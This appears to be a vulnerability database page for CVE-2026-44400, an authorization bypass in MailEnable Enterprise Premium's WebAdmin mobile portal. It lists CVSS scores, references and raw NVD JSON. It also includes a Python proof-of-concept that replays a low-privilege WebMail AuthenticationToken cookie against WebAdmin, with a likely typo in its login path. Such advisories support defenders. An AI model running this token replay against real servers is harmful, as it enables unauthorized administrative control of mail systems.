CVE-2026-44400

Description

MailEnable Enterprise Premium 10.55 and earlier contains an improper authorization vulnerability in the WebAdmin mobile portal that allows attackers to bypass authentication checks by reusing AuthenticationToken cookies generated for low-privileged users. Attackers can obtain a token from the WebMail login endpoint using the PersistentLogin parameter and replay it against the WebAdmin portal to perform highly privileged administrative actions.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

MailEnable Enterprise Premium <= 10.55

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL configuration
target_host = "http://target-mailenable-server"
webmail_login_url = f"{target_host}/mailmail/login.aspx"
webadmin_url = f"{target_host}/webadmin/mobile/default.aspx"

# Attacker credentials (low privilege)
username = "low_priv_user"
password = "password123"

# Step 1: Authenticate via WebMail and obtain PersistentLogin token
print("[+] Attempting to login via WebMail to obtain token...")
session = requests.Session()
payload = {
    "username": username,
    "password": password,
    "PersistentLogin": "on"  # Trigger persistent token generation
}

response = session.post(webmail_login_url, data=payload)

# Extract the AuthenticationToken cookie (Simulated extraction)
auth_token = session.cookies.get('AuthenticationToken')

if auth_token:
    print(f"[+] Token found: {auth_token}")
    
    # Step 2: Replay the token against WebAdmin portal
    print("[+] Replaying token against WebAdmin portal...")
    admin_cookies = {'AuthenticationToken': auth_token}
    admin_response = requests.get(webadmin_url, cookies=admin_cookies)
    
    # Check if authentication bypass was successful
    if admin_response.status_code == 200 and "Dashboard" in admin_response.text:
        print("[!] Successfully accessed WebAdmin with low-privilege token!")
        print(f"[+] Response length: {len(admin_response.text)}")
    else:
        print("[-] Failed to bypass authentication.")
else:
    print("[-] Could not retrieve AuthenticationToken cookie.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44400
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44400
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44400/
[4] VulDB https://vuldb.com/cve/CVE-2026-44400
[5] https://www.mailenable.com/Premium-ReleaseNotes.txt
[6] https://www.vulncheck.com/advisories/mailenable-enterprise-premium-authorization-bypass-via-webadmin

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44400", "sourceIdentifier": "[email protected]", "published": "2026-05-08T21:16:28.260", "lastModified": "2026-05-08T21:16:28.260", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "MailEnable Enterprise Premium 10.55 and earlier contains an improper authorization vulnerability in the WebAdmin mobile portal that allows attackers to bypass authentication checks by reusing AuthenticationToken cookies generated for low-privileged users. Attackers can obtain a token from the WebMail login endpoint using the PersistentLogin parameter and replay it against the WebAdmin portal to perform highly privileged administrative actions."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://www.mailenable.com/Premium-ReleaseNotes.txt", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/mailenable-enterprise-premium-authorization-bypass-via-webadmin", "source": "[email protected]"}]}}